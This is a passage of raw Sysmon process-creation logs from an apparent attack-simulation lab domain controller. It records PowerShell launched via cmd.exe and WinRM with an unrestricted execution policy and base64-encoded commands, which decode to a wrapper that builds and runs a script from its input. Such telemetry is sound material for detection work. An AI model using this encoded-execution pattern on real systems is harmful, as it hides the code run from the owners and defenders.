AALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 154100x8000000000000000429Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:10.327{A8622C2F-3DC6-6078-D502-00000000AD01}4280C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC5-6078-1B04-100000000000}0x10041b0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{A8622C2F-3DC6-6078-D402-00000000AD01}3740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 154100x8000000000000000409Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:10.183{A8622C2F-3DC6-6078-D402-00000000AD01}3740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC5-6078-1B04-100000000000}0x10041b0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DC6-6078-D302-00000000AD01}4776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 154100x8000000000000000386Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:10.045{A8622C2F-3DC6-6078-D302-00000000AD01}4776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC5-6078-1B04-100000000000}0x10041b0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DC6-6078-D202-00000000AD01}4604C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 154100x8000000000000000373Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:10.039{A8622C2F-3DC6-6078-D202-00000000AD01}4604C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC5-6078-1B04-100000000000}0x10041b0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DC5-6078-D002-00000000AD01}4284C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 154100x8000000000000000354Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:09.971{A8622C2F-3DC5-6078-D002-00000000AD01}4284C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-3DC5-6078-1B04-100000000000}0x10041b0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{A8622C2F-3C5A-6078-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x8000000000000000314Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:09.249{A8622C2F-3DC5-6078-CF02-00000000AD01}4900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESF4D7.tmp" 